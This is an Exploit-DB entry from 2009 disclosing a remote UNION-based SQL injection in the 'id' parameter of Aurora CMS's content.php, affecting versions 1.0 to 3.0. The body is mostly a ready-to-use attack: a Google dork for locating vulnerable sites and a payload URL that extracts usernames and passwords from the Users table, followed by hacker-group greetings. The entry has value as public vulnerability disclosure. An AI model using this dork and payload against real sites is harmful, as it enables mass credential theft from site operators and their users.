Aurora CMS - SQL Injection

EDB-ID:

10609

CVE:

N/A

Author:

Sora

Type:

webapps

Platform:

PHP

Published:

2009-12-22

# Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
# Date: December 22nd, 2009
# Author: Sora
# Software Link: http://www.auroracms.com.au/
# Version: 1.0, 2.0, and 3.0
# Tested on: Windows and Linux
------------------------------------------------
> Aurora CMS Remote SQL Injection Exploit
> Vulnerability in: content.php
> Found and disclosed by: Sora
> Contact: vhr95zw [at] hotmail.com

> Google dork: "Aurora CMS"

Aurora CMS suffers a remote SQL injection exploit in content.php.

The type is UNION statement SQL injection.

# Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!